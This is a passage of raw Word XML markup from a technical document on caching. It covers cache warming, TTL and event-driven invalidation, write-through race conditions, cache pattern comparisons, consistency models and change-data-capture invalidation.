    </w:p>
    <w:p w14:paraId="4A508552" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache warming (eager population):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Pre-populate the cache before the application serves traffic. Avoids the cold-start performance degradation after deployment. Used for predictable hot data (user sessions for known users, product catalog for an e-commerce launch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E178305" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1360"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Refresh-ahead (proactive refresh):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Before a cached item expires, proactively fetch a fresh copy from the backing store and refresh the cache entry. Eliminates cache miss latency at expiry — the next read always hits a fresh cache entry. Overhead: fetch requests that happen to never be read after refresh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3709FD55" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache Invalidation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1548674B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time-based invalidation (TTL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AF71AE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>The simplest strategy — each cache entry has a Time-To-Live. After TTL expires, the entry is considered stale. Next read triggers a fresh fetch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A8D3FD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTL as the primary consistency knob:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D95818" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1559A0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>data_change_frequency → appropriate TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C1EDA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Changes seconds:   TTL = 5-30s (accept some staleness)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D84EDC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Changes minutes:   TTL = 60-300s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36563A92" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Changes hours:     TTL = 1800-7200s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2511B50E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Changes days:      TTL = 86400s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335B8E89" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Never changes:     TTL = ∞ (or very long) with explicit invalidation on change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77FD4D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The TTL trade-off:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Shorter TTLs → more consistent but more origin load (more cache misses). Longer TTLs → more stale reads but less origin load. The appropriate TTL depends on the acceptable staleness window for the specific data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483D6384" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event-driven invalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761F920C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>When data changes in the backing store, explicitly invalidate or update the corresponding cache entries. More complex than TTL but enables immediate cache freshness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3432C10F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Delete on write:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A25291A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA69D52" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Application writes new data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EE0237" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def update_product(product_id, new_data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7F75B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    db.update('products', product_id, new_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4139562B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    cache.delete(f'product:{product_id}')  # invalidate immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAB8FFA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # Next read triggers fresh fetch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BF5A4B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Update on write (write-through):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF79502" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C5C8B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def update_product(product_id, new_data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A173322" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    db.update('products', product_id, new_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17119C1C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    cache.set(f'product:{product_id}', new_data, ttl=3600)  # update immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199EA236" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # Cache already has fresh data — next read is a hit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C1A264" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Update on write race condition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207FE00C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C300CD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Time 0: Thread A reads product_id=123 → cache miss, fetches old_data from DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2802AD83" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Time 1: Thread B writes new_data to DB, updates cache: cache.set('product:123', new_data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C749CB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>Time 2: Thread A populates cache: cache.set('product:123', old_data)  ← STALE!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D66A3FF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Thread A's delayed cache population overwrites Thread B's fresh update with stale data. The cache now contains stale data that won't expire until TTL. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This race is a fundamental problem with update-on-write patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> in concurrent systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AE50C5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D54F5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Delete instead of update:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Thread B deletes the cache entry rather than updating it. Thread A's cache.set would overwrite the deletion with stale data — this race still exists but is less likely to cause extended staleness (the next read after Thread A's set will also be a hit, but with stale data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3691081B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Better: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>conditional update</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> using version numbers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F0CA20" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5487110E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def update_product(product_id, new_data, version):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA6216C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    db.update('products', product_id, new_data, version=version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5D162E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    cache.set_if_version_greater(f'product:{product_id}', new_data, version=version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28DCC5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # Only updates cache if the version being set is newer than what's currently cached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAA475D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Read repair:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> On cache hit, occasionally fetch from DB and compare. If different, update cache. Adds latency overhead but catches inconsistencies. Used for very high-value consistency requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B806D70" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache-Aside vs Read-Through vs Write-Through — The Pattern Comparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F33370" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450909AF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Cache-Aside (most common):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C548AF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Read:  check cache → miss → read DB → populate cache → return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59820756" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Write: write DB → invalidate cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C605D0F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Who manages: APPLICATION CODE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DEFB17" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Pro: flexible, cache failures degrade to DB (graceful degradation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505377E6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Con: cache miss penalty (reads always go to DB on miss), thundering herd risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B8487" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="7987FDF0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Read-Through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7125EAA7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Read:  check cache → miss → CACHE automatically reads DB → return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A7FC48" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Write: write DB directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05863A7D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Who manages: CACHE LIBRARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E8935" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Pro: application doesn't manage cache population</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566267C8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Con: first read always cold, cache must know how to read from DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18343FF8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="2786DE8B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Write-Through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C143EFA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Write: write to CACHE → cache automatically writes DB → return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC0FDC6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Read:  check cache → always a hit (every write goes to cache)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D45FA3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Who manages: CACHE LIBRARY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0365A75E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Pro: cache always consistent with DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD268A2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Con: write latency = DB write latency (defeats cache's purpose for writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C05047D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistency Models for Distributed Caches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278A1025" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strong consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Every read returns the most recent write. Requires coordination — writes must invalidate all cache replicas before acknowledging. Adds latency proportional to the number of replicas and their geographic distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A2205" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eventual consistency:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> After a write, all cache replicas will eventually reflect the new value — but reads may return stale data for a window of time. This window is bounded by the cache's TTL (even without explicit invalidation, TTL ensures eventual freshness). Most distributed caches operate in this model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12181E11" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cache consistency guarantee hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42463C94" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EE1C5" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>1. No cache:           Always consistent (reads DB directly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5377FA89" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>2. Write-through TTL:  Consistent with TTL-bounded staleness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD34DE9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>3. Explicit invalidation: Consistent modulo invalidation propagation delay (seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160ABF4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>4. Pure TTL:          Consistent with TTL staleness (minutes to hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B16DFB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>5. No TTL, no invalidation: Indefinitely stale (cache is wrong forever)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D514D1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Change Data Capture (CDC) for cache invalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8C7F93" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Rather than application code explicitly invalidating the cache on writes, </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDC</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> monitors the database's change stream (MySQL binlog, PostgreSQL WAL, MongoDB oplog) and triggers cache invalidation whenever the underlying data changes — even if the change came from a source the application doesn't control (direct DB query, migration script, another service).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B070896" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E148B2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>DB Write → binlog entry → CDC system (Debezium, Maxwell) → Kafka event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AEA536" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">                                                          → Cache invalidation consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F04EC93" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">                                                          → cache.delete(affected_keys)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF482B8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDC-based invalidation is more robust</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
